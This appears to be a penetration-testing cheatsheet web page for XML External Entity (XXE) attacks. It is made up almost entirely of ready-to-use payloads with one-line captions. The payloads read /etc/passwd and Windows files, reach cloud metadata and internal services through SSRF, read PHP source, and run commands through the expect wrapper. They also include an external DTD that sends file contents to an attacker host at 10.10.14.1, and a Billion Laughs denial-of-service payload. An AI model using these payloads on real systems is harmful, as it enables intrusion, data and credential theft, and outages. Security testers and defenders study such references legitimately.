← All Cheatsheets
web-pentest

XXE — XML External Entity

XML External Entity attacks — local file read, SSRF, PHP filter/expect wrappers, blind & error-based out-of-band exfiltration via external DTDs, XInclude, SVG/Office documents and entity-expansion DoS.

1 views Jun 2026 lazyhackers
Basic File Read (3)
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
Read a local file via an external entity
fileread linux
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><foo>&xxe;</foo>
Windows local file read
fileread windows
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///">]><foo>&xxe;</foo>
Directory listing on some Java parsers
fileread java
SSRF via XXE (2)
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><foo>&xxe;</foo>
Reach cloud metadata through XXE
ssrf cloud
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://127.0.0.1:8080/">]><foo>&xxe;</foo>
Hit an internal-only service
ssrf internal
PHP Wrappers (3)
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">]><foo>&xxe;</foo>
Base64-wrap to read files with special chars (PHP)
php filter
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">
Read application PHP source code
php source
<!ENTITY xxe SYSTEM "expect://id">
Command exec if the PHP expect wrapper is enabled
php rce
Blind / Out-of-Band (3)
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10.14.1/evil.dtd"> %xxe;]>
Load an external DTD for out-of-band exfil
blind oob
evil.dtd: <!ENTITY % f SYSTEM "file:///etc/passwd"><!ENTITY % e "<!ENTITY x SYSTEM 'http://10.10.14.1/?d=%f;'>">%e;
External DTD that exfiltrates a file over HTTP
blind oob dtd
evil.dtd (error): <!ENTITY % f SYSTEM "file:///etc/passwd"><!ENTITY % e "<!ENTITY x SYSTEM 'file:///nope/%f;'>">%e;
Leak file contents inside a parser error message
error exfil
Other Vectors (4)
<x xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></x>
XInclude — works when you cannot control the DOCTYPE
xinclude fileread
SVG upload with <!DOCTYPE [<!ENTITY x SYSTEM "file:///etc/passwd">]> ... &x;
XXE through an uploaded SVG
svg upload
DOCX/XLSX: edit [Content_Types].xml or document.xml
XXE via Office Open XML documents
office upload
<!DOCTYPE lolz [<!ENTITY a "ha"><!ENTITY b "&a;&a;&a;...">]>
Billion Laughs entity-expansion DoS
dos

Related Articles

5
Web Hacking

JSON and YAML Unsafe Deserialization

Deep technical analysis of insecure deserialization across Java, PHP, Python, and Node.js …

20m read
Web Hacking

Supply Chain Attacks

Deep technical guide to software supply chain attacks — dependency confusion, malicious np…

16m read
Web Hacking

Cross-Site Scripting Mastery

Complete XSS guide covering all attack types, filter bypasses, CSP evasion, cookie stealin…

19m read
Web Hacking

File Upload to RCE

Complete file upload exploitation guide — MIME bypass, double extension tricks, polyglot J…

12m read
Web Hacking

Advanced SSRF

Complete SSRF exploitation guide — AWS IMDSv1/v2 credential theft, GCP/Azure metadata, bli…

16m read

Related Courses

2
Intermediate

Web Application Penetration Testing

Master web hacking from recon to reporting

30 · 9.3h
Intermediate

Bug Bounty Hunting — From Recon to Bounty

The practical playbook for finding real bugs on real targets. Recon methodology, vulnerabi…

0 · 7.2h